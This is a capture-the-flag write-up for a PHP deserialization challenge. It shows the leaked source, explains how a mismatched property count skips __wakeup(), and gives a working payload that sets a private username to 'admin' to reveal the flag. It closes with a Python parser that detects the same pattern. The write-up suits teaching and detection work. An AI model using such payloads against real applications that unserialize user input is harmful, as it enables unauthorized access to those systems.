2.6 [极客大挑战 2019]PHP

According to the challenge hint, the site has a source backup; downloading it gives www.zip.

It contains three PHP files.
class.php

```php
<?php
class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    // Called when the object is unserialized: resets username, so a plain payload never reaches 'admin'
    function __wakeup(){
        $this->username = 'guest';
    }

    // Called when the object is destroyed: checks password first, then username
    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();
        }
    }
}
?>
```

index.php

```php
<?php
include 'class.php';
$select = $_GET['select'];        // user-controlled input
$res=unserialize(@$select);       // passed straight to unserialize()
?>
```

flag.php

```php
<?php
$flag = 'Syc{dog_dog_dog_dog}';
?>
```

Analysis: $select is passed straight to unserialize(). The key is the __destruct() magic method in class.php, and with deserialization the order in which the magic methods run matters: __wakeup() fires when the object is unserialized, __destruct() when it is destroyed.

For this challenge we need username=admin and password=100, but __wakeup() runs first and overwrites username with 'guest', so the crux of the challenge is how to bypass __wakeup().
Knowledge point: how to bypass __wakeup

Testing in PHP:

Construct the payload:

```
?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
```

This payload bypasses __wakeup() so username is not overwritten: the object declares 3 properties but only 2 are present, and on the affected PHP versions this count mismatch makes unserialize() skip __wakeup() while still building the object. The %00 is needed because username and password are private properties: in the serialized form the property name is prefixed with the class name wrapped in NUL bytes (\0Name\0username), and those invisible bytes are lost when the string is copied.
Flag obtained.
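As an added example (not part of this writeup), a small Python inspector that parses the PHP serialization format and flags the property-count trick the payload above relies on, so the pattern can be spotted in request logs or checked before input reaches unserialize(); the token parser and the sample payloads are constructed for this page.

```python
"""Inspect PHP serialized input for the __wakeup-bypass pattern used above: an
object whose declared property count exceeds the properties actually present."""
from urllib.parse import unquote

def parse(s, i, objects):
    """Parse one serialized value at s[i]; return (value, next_index). Objects seen are appended to `objects`."""
    t = s[i]
    if t == "N":                                  # N;
        return None, i + 2
    if t in "ibd":                                # i:100;  b:1;  d:0.5;
        end = s.index(";", i)
        return (float(s[i + 2:end]) if t == "d" else int(s[i + 2:end])), end + 1
    if t == "s":                                  # s:5:"admin";  (length is in bytes)
        colon = s.index(":", i + 2)
        n = int(s[i + 2:colon])
        start = colon + 2                         # skip :"
        return s[start:start + n], start + n + 2  # skip closing " and ;
    if t in "aO":                                 # a:2:{...}  O:4:"Name":3:{...}
        colon = s.index(":", i + 2)
        cls = None
        if t == "O":
            n = int(s[i + 2:colon])
            cls = s[colon + 2:colon + 2 + n]
            i = colon + 2 + n + 1                 # the ':' before the property count
            colon = s.index(":", i + 1)
            declared = int(s[i + 1:colon])
        else:
            declared = int(s[i + 2:colon])
        i = colon + 2                             # skip :{
        members = {}
        while s[i] != "}":                        # key/value pairs until the closing brace
            key, i = parse(s, i, objects)
            val, i = parse(s, i, objects)
            members[key] = val                    # private props keep their \0Class\0 prefix
        if cls is not None:
            objects.append({"class": cls, "declared": declared, "actual": len(members)})
        return members, i + 1
    raise ValueError(f"unsupported token {t!r} at offset {i}")

def inspect(payload):
    """Decode a URL-encoded serialized string (%00 -> NUL) and return
    (all objects, objects whose declared count is larger than the real one)."""
    s = unquote(payload, encoding="latin-1")      # one char per byte keeps s:<len>: exact
    objects = []
    parse(s, 0, objects)
    return objects, [o for o in objects if o["declared"] > o["actual"]]

# Constructed samples: the writeup's payload, and a consistent one for contrast.
WRITEUP_PAYLOAD = 'O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}'
CONSISTENT_PAYLOAD = 'O:4:"Name":2:{s:14:"%00Name%00username";s:5:"guest";s:14:"%00Name%00password";i:100;}'
```

Only the tokens N, i, b, d, s, a and O are handled; anything else raises ValueError so an unexpected token is not silently accepted.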

Reference blog:
https://www.jianshu.com/p/bfe00fd583df
